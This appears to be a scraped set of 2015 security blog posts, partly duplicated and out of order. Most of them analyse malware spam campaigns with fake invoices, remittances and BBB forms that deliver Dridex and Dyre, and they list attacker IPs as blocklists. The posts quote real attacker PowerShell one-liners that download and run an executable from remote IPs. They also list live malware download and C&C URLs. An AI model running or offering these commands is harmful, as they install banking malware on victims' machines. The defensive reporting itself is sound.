"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:
85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)
It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.
Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151
Malware spam: "T.A.G. (The Automotive Group) Ltd." / "Lawrence Fisher [l.fisher@taghire.co.uk]" / invoice
This fake invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a forgery with a malicous attachment. Note that the taghire.co.uk simply shows "Under Construction".
http://laikah.de/js/bin.exe
Usually there are two or three versions of this document, but I have only seen one. If you look at the macro code itself, the download location is not encrypted in the code although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid anaylsus,
This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57. Automated reporting tools [1] [2] [3] show that this POSTS to 37.139.47.105. It appears that communication is attempted with the following IPs:
37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)
Also, according to the Malwr report, a DLL is dropped with a detection rate of 3/57.
Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70
From: Lawrence Fisher [l.fisher@taghire.co.uk]So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal. It contains an obfuscated Word macro which downloads an additional component from:
Date: 16 February 2015 at 08:25
Subject: invoice
Here is the invoice
Kind Regards,
Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield
Tel: 020 3750 0638
Description: 150px Crop Background Remove Logo
This e-mail is confidential and may be privileged. It may be read, copied and used only by the intended recipient. If you have received it in error, please contact the sender immediately by return e-mail or by telephoning 020 3750 0638
http://laikah.de/js/bin.exe
Usually there are two or three versions of this document, but I have only seen one. If you look at the macro code itself, the download location is not encrypted in the code although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid anaylsus,
This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57. Automated reporting tools [1] [2] [3] show that this POSTS to 37.139.47.105. It appears that communication is attempted with the following IPs:
37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)
Also, according to the Malwr report, a DLL is dropped with a detection rate of 3/57.
Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70
Saturday 14 February 2015
Spammer: Brad Smith / Unicore Health / unicorehealth.net / unicorehealth.com
This slimed its way into my mailbox:
Let's check the veracity of the message.. first, the mail headers.
Registrant Name: Brad Smith
Registrant Organization: Unicore Health
Registrant Street: 3200 Downwood Circle
Registrant Street: Suite 410
Registrant City: Atlanta
Registrant State/Province: Georgia
Registrant Postal Code: 30327
Registrant Country: United States
Registrant Phone: +1.6785226363
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: bsmith@unicorehealth.com
This links unicorehealth.net with unicorehealth.com. Indeed, we can find "Bradley Smith" on the unicorehealth.com web site.
I emailed Mr Smith back twice and asked him how he came across the email address. He didn't bother to reply.
Previously I mentioned that I have seen this type of spam before from one particular company, BizSummits, run by Michael Price. In particular, they look for potential names on a website and then spam them, a technique that is highly inaccurate but does seem to be relatively successful nonetheless.
Now, Unicore Health is not BizSummits. But they both use a virtual office address in Altanta, about ten miles apart. So perhaps there is some personal connection between the two businesses or the people behind them.
One of Mr Price's other businesses is called PlugMeIn (plugmein.com), which claims to reveal the email addresses of key people on certain websites. If this uses the same approach as the BizSummits spam, then it might well be just as inaccurate. And perhaps Unicore Health is using PlugMeIn technology to find email addresses.
But since Brad Smith didn't bother to reply to me, I can't tell if this spam was the result of faulty software, a bad email address list or just plain stupidity. Personally, I won't be buying anything from them soon.
UPDATE - January 2017
For various reasons, I ended revisiting this post and discovered that unicorehealth.net now displays a site "Hartford HR Summit" which is definitely a BizSummits / Michael Price site.
From: Brad Smith [sales@unicorehealth.net]Morgan Stanley? They must mean this Morgan Stanley. How did they confuse me with Morgan Stanley? Because I mention them on my website here. Now, I only know of one company that sends spam like this.. but more about them later.
To: Morgan Stanley [mstanley@redacted]
Date: 11 February 2015 at 15:24
Subject: Morgan, HR related question
Hi Morgan, could you let me know a time we could talk in the next few days? For HR managers we measure and video the essential functions and physical requirements of each key job so that clients like Coca-Cola and Publix can reduce their hiring risk and job injury risk. I thought you would like to quickly view the process, some interesting examples, and how to use them in your role. Just let me know a time that works in your schedule and I will confirm back, talk then!
Regards,
Brad Smith
VP, Product Management
Unicore Health
sales@unicorehealth.net
www.unicorehealth.net
This message is confidential and intended only for the original recipient. If you have received this message in error, please delete it or mail us back with re move in the sub ject. If any follow-up is needed I show your contact information as Morgan Stanley, mstanley@redacted and our address if needed is 3200 Downwood Circle, Ste 410, Atlanta, GA, 30327. Thank you.
Let's check the veracity of the message.. first, the mail headers.
Received: from [63.134.229.186] (port=1355 helo=mail.unicorehealth.net)We can see that the SPF record for unicorehealth.net matches it to 63.134.229.186. The domain unicorehealth.net is also hosted on the same IP, so we can be reasonably assured that this is not a forgery. Let's look at the WHOIS details for that domain..
by [redacted] with esmtp (Exim 4.80)
(envelope-from <sales@unicorehealth.net>)
id 1YLZ9H-0001CT-C2
for mstanley@redacted; Wed, 11 Feb 2015 15:24:20 +0000
Received: from 31617334.unicorehealth.net
by mail.unicorehealth.net (Right Sender 3.3) with ASMTP id YRJ55117
for <mstanley@redacted>; Wed, 11 Feb 2015 10:24:17 -0500
Message-ID: <20150211102412.2e7c8b6c6f@6e5d>
From: "Brad Smith" <sales@unicorehealth.net>
To: "Morgan Stanley" <mstanley@redacted>
Subject: Morgan, HR related question
Date: Wed, 11 Feb 2015 10:24:12 -0500
X-Priority: 3
X-Mailer: SMTP-Mailer 3.4
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Received-SPF: pass ([redacted]: domain of sales@unicorehealth.net designates 63.134.229.186 as permitted sender) client-ip=63.134.229.186 envelope-from=sales@unicorehealth.net helo=mail.unicorehealth.net
X-BlackCat-Spam-Score: -10
X-Mythic-Debug: Threshold = On =
X-Spam-Status: No, score=-1.1
Registrant Name: Brad Smith
Registrant Organization: Unicore Health
Registrant Street: 3200 Downwood Circle
Registrant Street: Suite 410
Registrant City: Atlanta
Registrant State/Province: Georgia
Registrant Postal Code: 30327
Registrant Country: United States
Registrant Phone: +1.6785226363
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: bsmith@unicorehealth.com
This links unicorehealth.net with unicorehealth.com. Indeed, we can find "Bradley Smith" on the unicorehealth.com web site.
I emailed Mr Smith back twice and asked him how he came across the email address. He didn't bother to reply.
Previously I mentioned that I have seen this type of spam before from one particular company, BizSummits, run by Michael Price. In particular, they look for potential names on a website and then spam them, a technique that is highly inaccurate but does seem to be relatively successful nonetheless.
Now, Unicore Health is not BizSummits. But they both use a virtual office address in Altanta, about ten miles apart. So perhaps there is some personal connection between the two businesses or the people behind them.
One of Mr Price's other businesses is called PlugMeIn (plugmein.com), which claims to reveal the email addresses of key people on certain websites. If this uses the same approach as the BizSummits spam, then it might well be just as inaccurate. And perhaps Unicore Health is using PlugMeIn technology to find email addresses.
But since Brad Smith didn't bother to reply to me, I can't tell if this spam was the result of faulty software, a bad email address list or just plain stupidity. Personally, I won't be buying anything from them soon.
UPDATE - January 2017
For various reasons, I ended revisiting this post and discovered that unicorehealth.net now displays a site "Hartford HR Summit" which is definitely a BizSummits / Michael Price site.
Labels:
BizSummits,
Spam,
Stupidity
Friday 13 February 2015
Something evil on 95.163.121.0/24 (Digital Network JSC / com4tel.ru / cloudavt.com)
I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirity of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.
inetnum: 95.163.121.0 - 95.163.121.255
netname: RU-CLOUDAVT-NET
descr: LLC ABT Cloud Network
country: RU
admin-c: PPP9992-RIPE
tech-c: PPP9992-RIPE
status: ASSIGNED PA
mnt-by: DN-MNT
changed: ncc@msm.ru 20150213
source: RIPE
person: Andrey Tkachenko
address: 107589, Russia Moscow street Khabarovsk 4A
e-mail: cc-it@com4tel.ru
phone: +7 916 626 7798
fax-no: +7 916 626 7798
nic-hdl: PPP9992-RIPE
abuse-mailbox: info@cloudavt.com
mnt-by: DN-MNT
changed: noc@msm.ru 20140429
source: RIPE
route: 95.163.64.0/18
descr: Digital Network JSC
descr: Moscow, Russia
descr: http://www.msm.ru
descr: aggregate prefix
origin: AS12695
mnt-by: DN-MNT
changed: noc@msm.ru 20121129
source: RIPE
Tools
Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]
That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.
inetnum: 95.163.121.0 - 95.163.121.255
netname: RU-CLOUDAVT-NET
descr: LLC ABT Cloud Network
country: RU
admin-c: PPP9992-RIPE
tech-c: PPP9992-RIPE
status: ASSIGNED PA
mnt-by: DN-MNT
changed: ncc@msm.ru 20150213
source: RIPE
person: Andrey Tkachenko
address: 107589, Russia Moscow street Khabarovsk 4A
e-mail: cc-it@com4tel.ru
phone: +7 916 626 7798
fax-no: +7 916 626 7798
nic-hdl: PPP9992-RIPE
abuse-mailbox: info@cloudavt.com
mnt-by: DN-MNT
changed: noc@msm.ru 20140429
source: RIPE
route: 95.163.64.0/18
descr: Digital Network JSC
descr: Moscow, Russia
descr: http://www.msm.ru
descr: aggregate prefix
origin: AS12695
mnt-by: DN-MNT
changed: noc@msm.ru 20121129
source: RIPE
Tools
Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]
That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.
Labels:
DINETHOSTING,
Evil Network,
Russia
Malware spam: "Alison Longworth [ALongworth@usluk.com]" / "PURCHASE ORDER (34663)"
From Alison Longworth [ALongworth@usluk.com]Attached is a malicious Word document 2600_001.DOC which actually comes in two different versions with low detection rates [1] [2] containing two slightly different macros [1] [2] which download a component from the following locations:
Date 13/02/2015 10:57
Subject PURCHASE ORDER (34663)
Please find attachment below of our Purchase Order No. 34663. Could you
please confirm receipt of this order and also advise when goods will be
available to collect.
NOTE TO ACCOUNTS: Could you please ensure all invoices for goods supplied
are forwarded promptly. Invoices received later than 2 working days after
month end will be dated, processed and paid the following month. To avoid
delays invoices can be sent electronically to accounts@usluk.com
Many Thanks,
Kind Regards,
Alison Longworth
Buyer (Manufacturing)
Universal Sealants (UK) Limited
Kingston House
3 Walton Road
Pattinson North
Washington
Tyne & Wear
NE38 8QA
W: www.usluk.com
E: alison.longworth@usluk.com
T: +44(0)191 416 1530
F: +44(0)191 402 1982
…Complete Solution for Bridge Deck Protection
USL BridgeCare, USL StructureCare, Nufins and Visul Systems are trading
divisions of Universal Sealants (UK) Limited.
Registered Office: Kingston House, 3 Walton Road, Pattinson North,
Washington, Tyne & Wear, NE38 8QA
Company Registration: 01494603
VAT Number: 353 8952 22
This email and any files transmitted with it are strictly confidential. It
is for the intended recipient only. If you have received this email in
error please notify the author by replying to this email. If you are not
the intended recipient, you must not disclose, copy, print or rely on this
email in any way. Any views expressed by an individual within email which
do not constitute or record professional advice relating to the business
of USL BridgeCare, USL StructureCare, Nufins and Visul Systems, do not
necessarily reflect the views of the company.
Important Notice
The information contained in this communication (including any
attachments) is confidential, may be attorney-client privileged, may
constitute inside information, and is intended only for the use of the
addressee. *Any Unauthorized use, disclosure or copying of this
information or any part thereof is strictly prohibited and may be
unlawful. If you have received this communication in error, please notify
us immediately by return e-mail and destroy this communication and all
copies thereof, including all attachments.
http://stroygp.ru/js/bin.exe
http://ibw-bautzen.de/js/bin.exe
This is saved as %TEMP%\dsHHH.exe and it has a detection rate of 13/57. Automated analysis tools [1] [2] [3] show the malware POSTing to:
37.139.47.105 (Pirix, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
The malware also drop a DLL with a MD5 of 6693f0093a2d6740149de5d6e950f6c6 (VT 6/57) which is the same Dridex DLL used in this campaign.
Malware spam: "Amazon Marketplace [delivery@amazon.uk]" / "Remittance [Report ID:34355-6014742]"
This email with no body text comes with a malicious Excel attachment:
From: Amazon Marketplace [delivery@amazon.uk]I have seen just a single sample of this with an attachment D87278F02E.XLS which has a zero detection rate at VirusTotal. This Excel spreadsheet contains this malicious Excel macro [pastebin] which attempts to execute the following command:
Date: 13 February 2015 at 14:34
Subject: RE: Remittance [Report ID:34355-6014742]
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.217/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';The downloaded file dhoei.exe is exactly the same as used in this spam run.
Malware spam: "Remittance XX12345678"
This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identifed as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52 and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159
From: Gale BarlowThere is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macrowhich downloads a file from the following location:
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP
http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identifed as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52 and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159
Thursday 12 February 2015
Questionable network: 5.135.127.64/27 / userlogin.me
While researching this spam I came across a questionable OVH reseller using the 5.135.127.64/27 range, allocated to userlogin.me.
organisation: ORG-WC13-RIPE
org-name: userlogin
org-type: OTHER
address:
e-mail: support@userlogin.me
abuse-mailbox: abuse@userlogin.me
descr: Userlogin account solutions
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ovh.net 20140521
source: RIPE
A look at passive DNS records show a variety of sites including stressers, phishing pages, spammers, some malware, plus some other sites which are probably less evil. A lot of these sites are hiding behind Cloudflare, some other sites have moved on to other hosts.
I checked the current IPs and reputations of all the domains that I can find associate with the domain and put them here [csv]. Don't assume they are all evil, but some of those sites are.. interesting.
organisation: ORG-WC13-RIPE
org-name: userlogin
org-type: OTHER
address:
e-mail: support@userlogin.me
abuse-mailbox: abuse@userlogin.me
descr: Userlogin account solutions
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ovh.net 20140521
source: RIPE
A look at passive DNS records show a variety of sites including stressers, phishing pages, spammers, some malware, plus some other sites which are probably less evil. A lot of these sites are hiding behind Cloudflare, some other sites have moved on to other hosts.
I checked the current IPs and reputations of all the domains that I can find associate with the domain and put them here [csv]. Don't assume they are all evil, but some of those sites are.. interesting.
Labels:
OVH
"invoice :reminder" spam leads to CVE-2012-0158 exploit
This spam has a malicious attachment:
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that is is malicious, with a detection rate of 6/57. Those detection indicate that this is exploitng CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble.
The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex.net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57 and the Malwr report for this indicates that among other things it installs a keylogger, confirmed by the ThreatExpert report.
The domain directxex.net [Googe Safebrowsing] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you block traffic to directxex.net.
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@valueline.in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that is is malicious, with a detection rate of 6/57. Those detection indicate that this is exploitng CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble.
The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex.net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57 and the Malwr report for this indicates that among other things it installs a keylogger, confirmed by the ThreatExpert report.
The domain directxex.net [Googe Safebrowsing] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you block traffic to directxex.net.
Malware spam: "BBB Accreditation Services [no-replay@newyork.bbb.org]" / "BBB SBQ Form"
This fake BBB email has a malicious attachment.
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57. Automated analysis tools [1] [2] [3] [4] show that attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211
time.microsoft.akadns.net
checkip.dyndns.org
Of these, checkip.dyndns.org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun.com on 95.173.170.227 (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http://semiyun.com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be blocked.
A file jeoQxZ5.exe is also dropped with a detection rate of 6/57. This is most likely the Dyre banking trojan. Samples can be found here, password is infected.
From: BBB Accreditation Services [no-replay@newyork.bbb.org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57. Automated analysis tools [1] [2] [3] [4] show that attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211
time.microsoft.akadns.net
checkip.dyndns.org
Of these, checkip.dyndns.org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun.com on 95.173.170.227 (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http://semiyun.com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be blocked.
A file jeoQxZ5.exe is also dropped with a detection rate of 6/57. This is most likely the Dyre banking trojan. Samples can be found here, password is infected.
Malware spam: "Minuteman Press West Loop" / "westloop@minutemanpress.com" / "INVOICE 1398 - FEB 4 2015"
This fake invoice comes with a malicious attachment. It does not come from Minuteman Press, their systems have not been compromised in any way. Instead this is a simple email forgery.
http://ecinteriordesign.com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57. Automated analysis tools [1] [2] [3] show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago.
From: Minuteman Press West Loop [westloop@minutemanpress.com]I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57 and contains this malicious macro which downloads a second component from:
Reply-To: westloop@minutemanpress.com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |
http://ecinteriordesign.com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57. Automated analysis tools [1] [2] [3] show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago.
Wednesday 11 February 2015
Malware spam: "Gail Walker [gail@mblseminars.com]" / "Outstanding Invoice 271741"
This fake invoice does NOT comes from MBL Seminars, they are not sending this spam nor have their systems been compromised. Instead, this is a forgery with a malicious attachment.
http://www.rapidappliances.co.uk/js/bin.exe
http://translatorswithoutborders.com/js/bin.exe
This file is saves as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:
37.139.47.105 (Comfortel, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
136.243.237.218 (Hetzner, Germany)
66.110.179.66 (Microtech Tel, US)
78.140.164.160 (Webazilla, Netherlands / Fozzy Inc, US)
109.234.38.70 (Mchost, Russia)
The Malwr report suggests an attempt to connect to these nonexistent domains:
U1Q6nUgvQfsx4xDu.com
bpmIYYreSPwa7.com
zdMjztmwoDX7cD.com
It also drops a DLL with a detection rate of 3/57 which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70
For researchers, a copy of the files can be found here. Password is infected.
http://advancedheattreat.com/js/bin.exe
http://ecinteriordesign.com/js/bin.exe
The payload appears to be the same as the one used in this spam run.
From: Gail Walker [gail@mblseminars.com]So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each [1] [2]. These download a component from the following locations:
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited
The Mill House
6 Worsley Road
Worsley
Manchester
United Kingdom
M28 2NL
Tel: +44 (0)161 793 0984
Fax: +44 (0)161 728 8139
http://www.rapidappliances.co.uk/js/bin.exe
http://translatorswithoutborders.com/js/bin.exe
This file is saves as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:
37.139.47.105 (Comfortel, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
136.243.237.218 (Hetzner, Germany)
66.110.179.66 (Microtech Tel, US)
78.140.164.160 (Webazilla, Netherlands / Fozzy Inc, US)
109.234.38.70 (Mchost, Russia)
The Malwr report suggests an attempt to connect to these nonexistent domains:
U1Q6nUgvQfsx4xDu.com
bpmIYYreSPwa7.com
zdMjztmwoDX7cD.com
It also drops a DLL with a detection rate of 3/57 which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70
For researchers, a copy of the files can be found here. Password is infected.
UPDATE 2015-02-12
Another spam run is under way, with the same text but two different DOC files with zero detections [1] [2] containing one of two malicious macros [1] [2] that download another component from one of the following locations:http://advancedheattreat.com/js/bin.exe
http://ecinteriordesign.com/js/bin.exe
The payload appears to be the same as the one used in this spam run.
Malware spam: "Your latest e-invoice from.."
This fake invoice spam has a malicious attachment:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:
http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzer, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)
The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.
Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:
85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)
The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
